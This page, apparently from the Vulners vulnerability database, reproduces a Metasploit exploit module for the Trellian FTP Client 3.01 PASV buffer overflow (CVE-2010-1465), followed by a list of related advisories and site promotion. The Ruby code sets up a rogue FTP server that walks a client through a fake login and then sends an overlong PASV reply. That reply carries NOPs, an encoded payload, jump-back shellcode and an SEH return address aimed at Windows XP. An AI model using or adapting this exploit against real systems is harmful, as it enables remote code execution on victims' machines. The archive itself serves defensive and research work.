Lucene search
K

Trellian FTP Client 3.01 PASV Remote Buffer Overflow

🗓️ 27 Apr 2010 00:00:00Reported by zombiefxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Trellian FTP Client 3.01 PASV Remote Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-1465
11 Apr 201000:00
circl
Check Point Advisories
Trellian FTP Client PASV Remote Buffer Overflow (CVE-2010-1465)
26 Oct 201600:00
checkpoint_advisories
CVE
CVE-2010-1465
16 Apr 201019:00
cve
Cvelist
CVE-2010-1465
16 Apr 201019:00
cvelist
Exploit DB
Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)
15 Jun 201000:00
exploitdb
Metasploit
Trellian FTP Client 3.01 PASV Remote Buffer Overflow
26 Apr 201018:20
metasploit
NVD
CVE-2010-1465
16 Apr 201019:30
nvd
OpenVAS
Trellian FTP 'PASV' Response Buffer Overflow Vulnerability
29 Apr 201000:00
openvas
OpenVAS
Trellian FTP 'PASV' Response Buffer Overflow Vulnerability
29 Apr 201000:00
openvas
Prion
Stack overflow
16 Apr 201019:30
prion
Rows per page
`##  
# $Id: trellian_client_pasv.rb 9143 2010-04-26 18:56:46Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::TcpServer  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',  
'Description' => %q{  
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered   
through an excessively long PASV message.  
},  
'Author' =>  
[  
'zombiefx', # Original exploit author  
'dookie' # MSF module author  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 9143 $',  
'References' =>  
[  
[ 'CVE', '2010-1465'],  
[ 'OSVDB', '63812'],  
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Payload' =>  
{  
'Space' => 900,  
'BadChars' => "\x00\x29\x2c\x2e",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe  
],  
'Privileged' => false,  
'DisclosureDate' => 'April 11 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),  
], self.class)  
end  
  
def on_client_connect(client)  
return if ((p = regenerate_payload(client)) == nil)  
  
# Let the client log in  
client.get_once  
  
user = "331 Please specify the password.\r\n"  
client.put(user)  
  
client.get_once  
pass = "230 Login successful.\r\n"  
client.put(pass)  
  
# Handle the clients PWD command  
client.get_once  
pwd = "257 \"/\" is current directory.\r\n"  
client.put(pwd)  
client.get_once  
  
sploit = "227 Entering Passive Mode ("  
sploit << rand_text_alpha_upper(2171)  
sploit << make_nops(100)  
sploit << payload.encoded  
sploit << make_nops(900 - (payload.encoded.length))  
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes  
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes  
sploit << [target.ret].pack("A3")  
sploit << ")\r\n"  
  
client.put(sploit)  
  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2010 00:00Current
1.2Low risk
Vulners AI Score1.2
EPSS0.65175
24